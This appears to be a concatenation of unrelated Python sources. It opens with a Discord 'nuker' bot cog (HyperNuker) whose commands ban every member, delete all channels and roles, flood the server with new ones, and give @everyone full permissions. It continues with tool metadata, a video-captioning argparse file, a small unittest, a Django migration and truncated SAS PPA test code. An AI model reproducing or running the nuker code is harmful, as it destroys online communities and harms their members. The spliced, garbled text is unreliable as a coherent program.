print(f"{Fore.YELLOW}[{cmd.upper()}] Mensagem -> {message.id} deletada - {self.time()}{Style.RESET_ALL}")
count += 1
except:
print(f"{Fore.RED}[{cmd.upper()}] Não foi possível apagar a mensagem -> {message.id} - {self.time()}{Style.RESET_ALL}")
count_error += 1
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Mensagem(ns) apagada(s) com sucesso - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.RED}[{cmd.upper()}] {count} Mensagem(ns) não foram apagada(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["create_channels"][1:])
@commands.has_permissions(manage_channels=True)
async def create_channels(self, ctx, limit:int=100):
cmd = ctx.invoked_with.lower()
count = 0
for i in range(limit):
nome = choice(self.nomes)
if nome == "":
nome = choice([f"Nuked By {self.client.user.name}", "Nuked with HyperNuker"])
try:
await ctx.guild.create_text_channel(nome)
print(f"{Fore.YELLOW}[{cmd.upper()}] Um canal foi criado com sucesso - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao criar um canal - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Canais foram criado com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["delete_channels"][1:])
@commands.has_permissions(manage_channels=True)
async def delete_channels(self, ctx):
cmd = ctx.invoked_with.lower()
count = 0
channels = ctx.guild.channels
for channel in channels:
try:
await channel.delete()
print(f"{Fore.YELLOW}[{cmd.upper()}] Um canal foi excluído com sucesso - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao excluir um canal - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Canal(is) deletado(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["create_roles"][1:])
@commands.has_permissions(manage_roles=True)
async def create_roles(self, ctx, limit:int=50):
cmd = ctx.invoked_with.lower()
count = 0
for i in range(limit):
nome = choice(self.nomes)
if nome == "":
nome = choice([f"Nuked By {self.client.user.name}", "Nuked with HyperNuker"])
try:
await ctx.guild.create_role(name=nome)
print(f"{Fore.YELLOW}[{cmd.upper()}] Um cargo foi criado com sucesso - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao criar um cargo - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Cargo(s) criados(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["delete_roles"][1:])
@commands.has_permissions(manage_roles=True)
async def delete_roles(self, ctx):
cmd = ctx.invoked_with.lower()
count = 0
roles = ctx.guild.roles
for role in roles:
try:
await role.delete()
print(f"{Fore.YELLOW}[{cmd.upper()}] Um cargo foi excluído com sucesso - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao excluir um cargo - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Cargo(s) excluído(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["ban_all"][1:])
@commands.has_permissions(ban_members=True)
async def ban_all(self, ctx):
cmd = ctx.invoked_with.lower()
print(f"{Fore.YELLOW}[{cmd.upper()}] Buscando membros no servidor - {self.time()}{Style.RESET_ALL}")
await ctx.guild.subscribe(delay=1.5)
print(f"{Fore.YELLOW}[{cmd.upper()}] Busca concluída... iniciando banimento - {self.time()}{Style.RESET_ALL}")
count = 0
for member in ctx.guild.members:
try:
await member.ban()
print(f"{Fore.YELLOW}[{cmd.upper()}] O membro {member.name} foi banido com sucesso - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao banir o membro {member.name} - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Membro(s) banido(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["nuke"][1:])
@commands.has_permissions(manage_channels=True, manage_roles=True, ban_members=True)
async def nuke(self, ctx):
cmd = ctx.invoked_with.lower()
everyone = ctx.guild.default_role
await everyone.edit(permissions=Permissions.all())
loop = get_running_loop()
loop.create_task(self.ban_all(ctx))
loop.create_task(self.delete_channels(ctx))
loop.create_task(self.delete_roles(ctx))
loop.create_task(self.create_channels(ctx))
loop.create_task(self.create_roles(ctx))
|
[
"discord.ext.commands.command",
"discord.ext.commands.has_permissions",
"random.choice",
"asyncio.get_running_loop",
"discord.Permissions.all",
"datetime.datetime.now"
] |
[((1649, 1694), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['spam'][1:]"}), "(aliases=content['spam'][1:])\n", (1665, 1694), False, 'from discord.ext import commands\n'), ((2411, 2457), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['purge'][1:]"}), "(aliases=content['purge'][1:])\n", (2427, 2457), False, 'from discord.ext import commands\n'), ((3298, 3354), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['create_channels'][1:]"}), "(aliases=content['create_channels'][1:])\n", (3314, 3354), False, 'from discord.ext import commands\n'), ((3360, 3406), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_channels': '(True)'}), '(manage_channels=True)\n', (3384, 3406), False, 'from discord.ext import commands\n'), ((4177, 4233), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['delete_channels'][1:]"}), "(aliases=content['delete_channels'][1:])\n", (4193, 4233), False, 'from discord.ext import commands\n'), ((4239, 4285), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_channels': '(True)'}), '(manage_channels=True)\n', (4263, 4285), False, 'from discord.ext import commands\n'), ((4935, 4988), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['create_roles'][1:]"}), "(aliases=content['create_roles'][1:])\n", (4951, 4988), False, 'from discord.ext import commands\n'), ((4994, 5037), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (5018, 5037), False, 'from discord.ext import commands\n'), ((5812, 5865), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['delete_roles'][1:]"}), "(aliases=content['delete_roles'][1:])\n", (5828, 5865), False, 'from discord.ext import commands\n'), ((5871, 5914), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (5895, 5914), False, 'from discord.ext import commands\n'), ((6517, 6565), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['ban_all'][1:]"}), "(aliases=content['ban_all'][1:])\n", (6533, 6565), False, 'from discord.ext import commands\n'), ((6571, 6613), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'ban_members': '(True)'}), '(ban_members=True)\n', (6595, 6613), False, 'from discord.ext import commands\n'), ((7488, 7533), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['nuke'][1:]"}), "(aliases=content['nuke'][1:])\n", (7504, 7533), False, 'from discord.ext import commands\n'), ((7539, 7626), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_channels': '(True)', 'manage_roles': '(True)', 'ban_members': '(True)'}), '(manage_channels=True, manage_roles=True,\n ban_members=True)\n', (7563, 7626), False, 'from discord.ext import commands\n'), ((7812, 7830), 'asyncio.get_running_loop', 'get_running_loop', ([], {}), '()\n', (7828, 7830), False, 'from asyncio import get_running_loop\n'), ((3572, 3590), 'random.choice', 'choice', (['self.nomes'], {}), '(self.nomes)\n', (3578, 3590), False, 'from random import choice\n'), ((5199, 5217), 'random.choice', 'choice', (['self.nomes'], {}), '(self.nomes)\n', (5205, 5217), False, 'from random import choice\n'), ((3642, 3712), 'random.choice', 'choice', (["[f'Nuked By {self.client.user.name}', 'Nuked with HyperNuker']"], {}), "([f'Nuked By {self.client.user.name}', 'Nuked with HyperNuker'])\n", (3648, 3712), False, 'from random import choice\n'), ((5268, 5338), 'random.choice', 'choice', (["[f'Nuked By {self.client.user.name}', 'Nuked with HyperNuker']"], {}), "([f'Nuked By {self.client.user.name}', 'Nuked with HyperNuker'])\n", (5274, 5338), False, 'from random import choice\n'), ((1528, 1542), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1540, 1542), False, 'from datetime import datetime\n'), ((7777, 7794), 'discord.Permissions.all', 'Permissions.all', ([], {}), '()\n', (7792, 7794), False, 'from discord import Permissions\n')]
|
import argparse
# set for MSR-VTT defaults
def parse_opts():
parser = argparse.ArgumentParser()
parser.add_argument(
'--dataset',
type=str,
default='msvd',
choices=[
'msvd',
'msrvtt'],
help='Dataset to use')
parser.add_argument(
'--model_id',
type=str,
help='unique identifier for model')
parser.add_argument(
'--results_dir',
type=str,
default='experiments',
help='directory to store results')
parser.add_argument(
'--model_file',
type=str,
help='output model file')
parser.add_argument(
'--result_file',
type=str,
help='output result file')
parser.add_argument(
'--concepts_h5',
type=str,
default='sequencelabel',
help='what concept labels to use as generated from extract_svo.py')
parser.add_argument(
'--train_label_h5',
type=str,
help='path to the h5file containing the preprocessed dataset')
parser.add_argument(
'--val_label_h5',
type=str,
help='path to the h5file containing the preprocessed dataset')
parser.add_argument(
'--test_label_h5',
type=str,
help='path to the h5file containing the preprocessed dataset')
parser.add_argument(
'--train_feat_h5',
type=str,
nargs='+',
help='path to the h5 file containing extracted features')
parser.add_argument(
'--val_feat_h5',
type=str,
nargs='+',
help='path to the h5 file containing extracted features')
parser.add_argument(
'--test_feat_h5',
type=str,
nargs='+',
help='path to the h5 file containing extracted features')
parser.add_argument(
'--bfeat_h5',
type=str,
nargs='+',
help='path to the h5 file containing extracted features')
parser.add_argument(
'--fr_size_h5',
type=str,
help='path to the h5 file containing frame size')
parser.add_argument(
'--train_cocofmt_file',
type=str,
help='Gold captions in MSCOCO format to cal language metrics')
parser.add_argument(
'--val_cocofmt_file',
type=str,
help='Gold captions in MSCOCO format to cal language metrics')
parser.add_argument(
'--test_cocofmt_file',
type=str,
help='Gold captions in MSCOCO format to cal language metrics')
parser.add_argument(
'--train_bcmrscores_pkl',
type=str,
help='Pre-computed Cider-D metric for all captions')
parser.add_argument(
'--train_cached_tokens',
type=str,
help='Path to idx document frequencies to cal Cider on training data')
parser.add_argument(
'--input_features',
default='imrc',
type=str,
help='i image, m motion, r region, c classification')
# Optimization: General
parser.add_argument(
'--max_patience',
type=int,
default=50,
        help='max number of epochs to run since the minimum is detected -- early stopping')
parser.add_argument(
'--batch_size',
type=int,
default=64,
help='Video batch size (there will be x seq_per_img sentences)')
parser.add_argument(
'--test_batch_size',
type=int,
default=64,
help='what is the batch size in number of images per batch? (there will be x seq_per_img sentences)')
parser.add_argument(
'--train_seq_per_img',
type=int,
default=20,
help='number of captions to sample for each image during training. Done for efficiency since CNN forward pass is expensive.')
parser.add_argument(
'--test_seq_per_img',
type=int,
default=20,
help='number of captions to sample for each image during training. Done for efficiency since CNN forward pass is expensive.')
parser.add_argument(
'--train_captions_per_img',
type=int,
default=20,
help='number of captions to sample for each image during training. Done for efficiency since CNN forward pass is expensive.')
parser.add_argument(
'--test_captions_per_img',
type=int,
default=20,
help='number of captions to sample for each image during training. Done for efficiency since CNN forward pass is expensive.')
parser.add_argument(
'--learning_rate',
type=float,
default=1e-4,
help='learning rate')
parser.add_argument(
'--lr_update',
default=200,
type=int,
help='Number of epochs to update the learning rate.')
# Model settings
parser.add_argument(
'--captioner_type',
type=str,
default='lstm',
choices=[
'lstm',
'gru',
'rnn',
'transformer'],
help='type of RNN')
parser.add_argument(
'--captioner_size',
type=int,
default=512,
help='size of the captioner in number of hidden nodes in each layer')
parser.add_argument(
'--captioner_layers',
type=int,
default=1,
help='number of layers in the captioner')
parser.add_argument(
'--captioner_heads',
type=int,
default=1,
help='number of heads in the captioner')
parser.add_argument(
'--filter_type',
type=str,
default='svo_original',
choices=[
'none',
'tran_enc',
'svo_original',
'svo_transformer',
'svo_transformer_2',
'concept_transformer',
'visual_encoder_only'],
help='type of the filtering prior to captioning')
parser.add_argument(
'--input_encoder_size',
type=int,
default=512,
help='size of the input in number of hidden nodes in each encoder layer')
parser.add_argument(
'--input_encoder_layers',
type=int,
default=0,
help='number of layers in the input encoder')
parser.add_argument(
'--input_encoder_heads',
type=int,
default=1,
help='number of heads in the input encoder')
parser.add_argument(
'--grounder_type',
type=str,
default='none',
choices=[
'none',
'niuc',
'nioc',
'iuc',
'ioc'],
help='type of the grounding prior to captioning')
parser.add_argument(
'--grounder_size',
type=int,
default=512,
help='size of the grounder in number of hidden nodes in each grounder layer')
parser.add_argument(
'--grounder_layers',
type=int,
default=1,
help='number of layers in the grounder')
parser.add_argument(
'--grounder_heads',
type=int,
default=1,
help='number of heads in the grounder decoder')
parser.add_argument(
'--gt_concepts_while_training',
type=int,
default=1,
help='use the ground truth concepts for input into the caption generator during training')
parser.add_argument(
'--gt_concepts_while_testing',
type=int,
default=0,
help='use the ground truth concepts for input into the caption generator during testing, useful for best case check')
parser.add_argument(
'--num_concepts',
type=int,
default=3,
help='number of concepts (normally 3, 5)')
parser.add_argument(
'--att_size',
type=int,
default=512,
help='size of the att in number of hidden nodes')
parser.add_argument(
'--num_lm_layer',
type=int,
default=1,
help='size of the rnn in number of hidden nodes in each layer')
parser.add_argument(
'--input_encoding_size',
type=int,
default=512,
help='the encoding size of each frame in the video.')
parser.add_argument(
'--max_epochs',
type=int,
default=200,
help='max number of epochs to run for (-1 = run forever)')
parser.add_argument(
'--grad_clip',
type=float,
default=0.25,
help='clip gradients at this value (note should be lower than usual 5 because we normalize grads by both batch and seq_length)')
parser.add_argument(
'--drop_prob_lm',
type=float,
default=0.5,
help='strength of dropout in the Language Model RNN')
# Optimization: for the Language Model
parser.add_argument(
'--optim',
type=str,
default='adam',
help='what update to use? sgd|sgdmom|adagrad|adam')
parser.add_argument(
'--optim_alpha',
type=float,
default=0.8,
help='alpha for adagrad/rmsprop/momentum/adam')
parser.add_argument(
'--optim_beta',
type=float,
default=0.999,
help='beta used for adam')
parser.add_argument(
'--optim_epsilon',
type=float,
default=1e-8,
help='epsilon that goes into denominator for smoothing')
# Evaluation/Checkpointing
parser.add_argument(
'--save_checkpoint_from',
type=int,
default=1,
help='Start saving checkpoint from this epoch')
parser.add_argument(
'--save_checkpoint_every',
type=int,
default=1,
help='how often to save a model checkpoint in epochs?')
parser.add_argument(
'--use_rl',
type=int,
default=0,
help='Use RL training or not')
parser.add_argument(
'--use_rl_after',
type=int,
default=0, # 30
help='Start RL training after this epoch')
parser.add_argument(
'--expand_feat',
type=int,
default=1,
help='To expand features when sampling (to multiple captions)')
parser.add_argument(
'--start_from',
type=str,
default='',
help='Load state from this file to continue training')
parser.add_argument(
'--language_eval',
type=int,
default=1,
help='Evaluate language evaluation')
parser.add_argument(
'--eval_metric',
default='CIDEr',
choices=[
'Loss',
'Bleu_4',
'METEOR',
'ROUGE_L',
'CIDEr',
'MSRVTT'],
help='Evaluation metrics')
parser.add_argument(
'--test_language_eval',
type=int,
default=1,
help='Evaluate language evaluation')
parser.add_argument(
'--print_log_interval',
type=int,
default=20,
help='How often do we snapshot losses, for inclusion in the progress dump? (0 = disable)')
parser.add_argument(
'--loglevel',
type=str,
default='DEBUG',
choices=[
'DEBUG',
'INFO',
'WARNING',
'ERROR',
'CRITICAL'])
# misc
parser.add_argument(
'--seed',
type=int,
default=123,
help='random number generator seed to use')
parser.add_argument(
'--gpuid',
type=int,
default=7,
help='which gpu to use. -1 = use CPU')
parser.add_argument(
'--num_chunks',
type=int,
default=1,
help='1: no attention, > 1: attention with num_chunks')
parser.add_argument(
'--model_type',
type=str,
default='concat',
choices=[
'standard',
'concat',
'manet',
],
help='Type of models')
parser.add_argument(
'--decouple',
type=int,
default=0,
choices=[0,1],
help='decouple the concept and visual feats?')
parser.add_argument(
'--pass_all_svo',
type=int,
default=0,
choices=[0,1],
help='Pass all s,v,o to the LSTM cap gen, or just v')
parser.add_argument(
'--clamp_concepts',
type=int,
default=1,
choices=[0, 1],
help='0: Use decoder output at t-1 as decoder input at t. 1: Clamp decoder output at t-1 to best word, and get this word embedding for decoder input at t.')
parser.add_argument(
'--beam_size',
type=int,
default=5,
help='Beam search size')
parser.add_argument(
'--labda',
type=float,
default=12.0,
help='Weights on svos over captions')
parser.add_argument(
'--use_ss',
type=int,
default=0,
help='Use schedule sampling')
parser.add_argument(
'--use_ss_after',
type=int,
default=0,
help='Use schedule sampling after this epoch')
parser.add_argument(
'--ss_max_prob',
type=float,
default=0.25,
help='Use schedule sampling')
parser.add_argument(
'--ss_k',
type=float,
default=100,
help='plot k/(k+exp(x/k)) from x=0 to 400, k=30')
parser.add_argument(
'--use_mixer',
type=int,
default=0, # 1
help='Use schedule sampling')
parser.add_argument(
'--mixer_from',
type=int,
default=-1,
        help='If -1, then an annealing scheme will be used, based on mixer_descrease_every.\
        Initially it will be set to the max_seq_length (30), and will be gradually decreased to 1.\
        If this value is set to 1 from the beginning, then the MIXER approach is not applied')
parser.add_argument(
'--mixer_descrease_every',
type=int,
default=2,
        help='Epoch interval to decrease the mixing value')
parser.add_argument(
'--use_cst',
type=int,
default=0,
help='Use cst training')
parser.add_argument(
'--use_cst_after',
type=int,
default=0,
help='Start cst training after this epoch')
parser.add_argument(
'--cst_increase_every',
type=int,
default=5,
help='Epoch interval to increase cst baseline')
parser.add_argument(
'--scb_baseline',
type=int,
default=1,
help='which Self-consensus baseline (SCB) to use? 1: GT SCB, 2: Model Sample SCB')
parser.add_argument(
'--scb_captions',
type=int,
default=0,
help='-1: annealing, otherwise using this fixed number to be the number of captions to compute SCB')
parser.add_argument(
'--use_eos',
type=int,
default=0,
help='If 1, keep <EOS> in captions of the reference set')
parser.add_argument(
'--output_logp',
type=int,
default=0,
        help='Output average log likelihood of the test and GT captions. Used for robustness analysis at test time.')
args = parser.parse_args()
return args
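# A minimal usage sketch, assuming the MSVD/MSR-VTT defaults are acceptable: parse with no
# command-line overrides and print a few of the parsed options (the chosen fields are
# arbitrary examples).
if __name__ == '__main__':
    _args = parse_opts()
    print(_args.dataset, _args.batch_size, _args.learning_rate)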
|
[
"argparse.ArgumentParser"
] |
[((76, 101), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (99, 101), False, 'import argparse\n')]
|
import ctypes
import ctypes.util
import os
import unittest
import sys
import meg
class TestLibmatrix(unittest.TestCase):
def test(self):
matrix = meg.libmatrix.mxCreateDoubleMatrix(
3, 4, meg.libmatrix.Complexity.REAL)
self.assertEqual(meg.libmatrix.mxIsNumeric(matrix), True)
self.assertEqual(meg.libmatrix.mxGetNumberOfDimensions(matrix), 2)
shape = meg.libmatrix.mxGetDimensions(matrix)
self.assertEqual((shape[0], shape[1]), (3,4))
with self.assertRaises(RuntimeError):
meg.libmatrix.mxGetImagData(matrix)
meg.libmatrix.mxDestroyArray(matrix)
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"meg.libmatrix.mxIsNumeric",
"meg.libmatrix.mxDestroyArray",
"meg.libmatrix.mxGetDimensions",
"meg.libmatrix.mxGetImagData",
"meg.libmatrix.mxGetNumberOfDimensions",
"meg.libmatrix.mxCreateDoubleMatrix"
] |
[((691, 706), 'unittest.main', 'unittest.main', ([], {}), '()\n', (704, 706), False, 'import unittest\n'), ((160, 231), 'meg.libmatrix.mxCreateDoubleMatrix', 'meg.libmatrix.mxCreateDoubleMatrix', (['(3)', '(4)', 'meg.libmatrix.Complexity.REAL'], {}), '(3, 4, meg.libmatrix.Complexity.REAL)\n', (194, 231), False, 'import meg\n'), ((402, 439), 'meg.libmatrix.mxGetDimensions', 'meg.libmatrix.mxGetDimensions', (['matrix'], {}), '(matrix)\n', (431, 439), False, 'import meg\n'), ((614, 650), 'meg.libmatrix.mxDestroyArray', 'meg.libmatrix.mxDestroyArray', (['matrix'], {}), '(matrix)\n', (642, 650), False, 'import meg\n'), ((270, 303), 'meg.libmatrix.mxIsNumeric', 'meg.libmatrix.mxIsNumeric', (['matrix'], {}), '(matrix)\n', (295, 303), False, 'import meg\n'), ((336, 381), 'meg.libmatrix.mxGetNumberOfDimensions', 'meg.libmatrix.mxGetNumberOfDimensions', (['matrix'], {}), '(matrix)\n', (373, 381), False, 'import meg\n'), ((561, 596), 'meg.libmatrix.mxGetImagData', 'meg.libmatrix.mxGetImagData', (['matrix'], {}), '(matrix)\n', (588, 596), False, 'import meg\n')]
|
# Generated by Django 3.0.3 on 2020-05-30 16:13
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('courses', '0015_course_fee_type'),
('profiles', '0001_initial'),
('course_homes', '0015_learningtopic_info'),
]
operations = [
migrations.AddField(
model_name='coursehome',
name='end_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='coursehome',
name='expected_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='coursehome',
name='open_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='coursehome',
name='over_admission_days',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='coursehome',
name='teacher',
field=models.ForeignKey(blank=True, limit_choices_to={'is_teacher': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='teacher_course', to='profiles.Profile'),
),
migrations.AlterField(
model_name='coursehome',
name='course',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='c_homes', to='courses.Course'),
),
migrations.AlterField(
model_name='coursehome',
name='status',
field=models.CharField(choices=[('open', 'Active'), ('closed', 'Closed'), ('full', 'Full')], default='open', max_length=10),
),
]
|
[
"django.db.models.DateField",
"django.db.models.IntegerField",
"django.db.models.CharField",
"django.db.models.ForeignKey"
] |
[((461, 500), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (477, 500), False, 'from django.db import migrations, models\n'), ((631, 670), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (647, 670), False, 'from django.db import migrations, models\n'), ((797, 836), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (813, 836), False, 'from django.db import migrations, models\n'), ((973, 1015), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (992, 1015), False, 'from django.db import migrations, models\n'), ((1140, 1328), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'limit_choices_to': "{'is_teacher': True}", 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""teacher_course"""', 'to': '"""profiles.Profile"""'}), "(blank=True, limit_choices_to={'is_teacher': True}, null=\n True, on_delete=django.db.models.deletion.CASCADE, related_name=\n 'teacher_course', to='profiles.Profile')\n", (1157, 1328), False, 'from django.db import migrations, models\n'), ((1444, 1556), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""c_homes"""', 'to': '"""courses.Course"""'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='c_homes', to='courses.Course')\n", (1461, 1556), False, 'from django.db import migrations, models\n'), ((1677, 1798), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('open', 'Active'), ('closed', 'Closed'), ('full', 'Full')]", 'default': '"""open"""', 'max_length': '(10)'}), "(choices=[('open', 'Active'), ('closed', 'Closed'), ('full',\n 'Full')], default='open', max_length=10)\n", (1693, 1798), False, 'from django.db import migrations, models\n')]
|
# Copyright 2018 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of PCR tests."""
import json
import logging
import os
import sas_testcase
import uuid
from shapely import ops
from full_activity_dump_helper import getFullActivityDumpSasUut
from reference_models.ppa import ppa
from reference_models.geo import drive, utils
from util import configurable_testcase, loadConfig, \
makePalRecordsConsistent, writeConfig, getCertificateFingerprint, \
makePpaAndPalRecordsConsistent, getCertFilename
from request_handler import HTTPError
from datetime import datetime, timedelta
import time
SAS_TEST_HARNESS_URL = 'https://test.harness.url.not.used/v1.2'
def getSasUutClaimedPpaBoundaryFilePath(config_filename):
"""Get the absolute file path SAS UUT claimed PPA boundary to be stored.
Args:
config_filename: The absolute file path of the configuration file used in PCR.1 test.
      It is required to differentiate the SAS UUT claimed PPA boundary stored as a result of
      the PCR.1 test executed with different configuration files.
Returns:
    The expected absolute file path where the PPA zone received from the SAS UUT as part of
    the PCR.1 test is to be stored.
"""
ppa_zone_data_dir_path = os.path.join('testcases', 'output',
'test_WINNF_FT_S_PCR_1')
ppa_zone_data_file_name = 'sas_uut_claimed_ppa_boundary_' + \
config_filename + '.json'
ppa_zone_data_file_path = os.path.join(ppa_zone_data_dir_path,
ppa_zone_data_file_name)
return ppa_zone_data_file_path
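# For example, a configuration file named 'default.config' (as used by the default PCR.1
# and PCR.3 configs below) maps to:
#   testcases/output/test_WINNF_FT_S_PCR_1/sas_uut_claimed_ppa_boundary_default.config.json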
def isPpaWithinServiceArea(pal_records, ppa_zone_geometry):
"""Check if the ppa zone geometry with in service area then return True.
Checks the ppa zone geometry's boundary and interior intersect only with the
interior of the service area (not its boundary or exterior).
Args:
pal_records: A list of pal records to compute service area based on
census_tracts.
ppa_zone_geometry: A PPA polygon dictionary in GeoJSON format.
Returns:
    True if the PPA zone geometry's boundary and interior intersect only with the
    interior of the service area, otherwise False.
"""
# Get the census tract for each pal record and convert it to Shapely
# geometry.
census_tracts_for_pal = [
utils.ToShapely(drive.census_tract_driver.GetCensusTract(
pal['license']['licenseAreaIdentifier'])
['features'][0]['geometry']) for pal in pal_records]
pal_service_area = ops.cascaded_union(census_tracts_for_pal)
# Convert GeoJSON dictionary to Shapely object.
ppa_zone_shapely_geometry = utils.ToShapely(ppa_zone_geometry)
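  # The tiny negative buffer shrinks the PPA slightly, so a PPA that merely shares a
  # boundary with the service area is still treated as being within it.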
return ppa_zone_shapely_geometry.buffer(-1e-6).within(pal_service_area)
def assertRegConditionalsForPpaRefModel(registration_requests,
conditional_registration_data):
"""Check the REG Conditionals for PPA creation model and raises an exception.
Performs the assert to check installationParam present in
registrationRequests or conditional registration data and raises an exception.
PpaCreationModel requires the input registrationRequests to have
'installationParam'. But this parameter is removed for devices where
conditionals are pre-loaded. Adding the 'installationParam' into
registrationRequests by taking the corresponding values from
conditionalRegistrationData.
Args:
registration_requests: A list of individual CBSD registration
requests (each of which is itself a dictionary).
conditional_registration_data: A list of individual CBSD registration
data that need to be preloaded into SAS (each of which is a dictionary).
the fccId and cbsdSerialNumber fields are required, other fields are
optional but required for ppa reference model.
Raises:
    Exception: If the installationParam object and its required fields are not
      found in conditionalRegistrationData or registrationRequests for
      category B devices.
"""
for device in registration_requests:
if 'installationParam' not in device:
install_param_assigned = False
for conditional_params in conditional_registration_data:
# Check if FCC_ID+Serial_Number present in registrationRequest
# and conditional_params match and add the 'installationParam'.
if (conditional_params['fccId'] == device['fccId'] and
conditional_params['cbsdSerialNumber'] == device['cbsdSerialNumber']):
device.update({'installationParam': conditional_params['installationParam']})
install_param_assigned = True
# If the cbsdCategory is not present in registration request then
# assign it to the cbsdCategory in conditional_params.
if 'cbsdCategory' not in device:
# Causes KeyError: 'cbsdCategory' if 'cbsdCategory' does not exist
device['cbsdCategory'] = conditional_params['cbsdCategory']
break
# Raise an exception if InstallationParam is not found in the conditionals.
if not install_param_assigned:
raise Exception("InstallationParam not found in conditionals for device "
"%s:%s" % (device['fccId'], device['cbsdSerialNumber']))
class PpaCreationTestcase(sas_testcase.SasTestCase):
"""Implementation of PCR tests.
  Checks that the area of the non-overlapping difference between the maximum PPA boundary
  created by the SAS UUT and the maximum PPA boundary created by the Reference Model is no
  more than 10% of the area of the Reference Model boundary, under different varying
  conditions, and verifies that the SAS UUT is able to create a PPA zone or return an error.
"""
def triggerFadGenerationAndRetrievePpaZone(self, ssl_cert, ssl_key):
"""Triggers FAD and Retrieves PPA Zone Record.
Pulls FAD from SAS UUT. Retrieves the ZoneData Records from FAD,
checks that only one record is present.
Args:
ssl_cert: Path to SAS type cert file to be used for pulling FAD record.
ssl_key: Path to SAS type key file to be used for pulling FAD record.
Returns:
A PPA record of format of ZoneData Object.
"""
# Notify the SAS UUT about the SAS Test Harness.
certificate_hash = getCertificateFingerprint(ssl_cert)
self._sas_admin.InjectPeerSas({'certificateHash': certificate_hash,
'url': SAS_TEST_HARNESS_URL})
# As SAS is reset at the beginning of the test, the FAD records should
# contain only one zone record containing the PPA that was generated.
# Hence the first zone record is retrieved.
uut_fad = getFullActivityDumpSasUut(self._sas, self._sas_admin, ssl_cert,
ssl_key)
    # Check that the retrieved FAD is valid and has at least one
    # PPA zone record.
uut_ppa_zone_data = uut_fad.getZoneRecords()
self.assertEquals(len(uut_ppa_zone_data), 1,
msg='There is no single PPA Zone record received from SAS'
' UUT')
return uut_ppa_zone_data[0]
def generate_PCR_1_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 1."""
# Load PAL records.
pal_record_a = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_1.json')))
pal_record_b = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_2.json')))
# Use the FIPS codes of adjacent census tracts.
pal_record_a['fipsCode'] = 20063955100
